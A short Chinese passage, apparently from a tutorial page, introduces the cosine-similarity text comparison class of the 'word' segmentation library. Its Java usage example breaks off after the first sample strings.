    word分词提供了多种文本相似度计算方式: 方式一:余弦相似度,通过计算两个向量的夹角余弦值来评估他们的相似度 实现类:org.apdplat.word.analysis.CosineTextSimilarity 用法如下: String text1 = "我爱购物"; String text2 = "我爱读书"; String text3 =
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他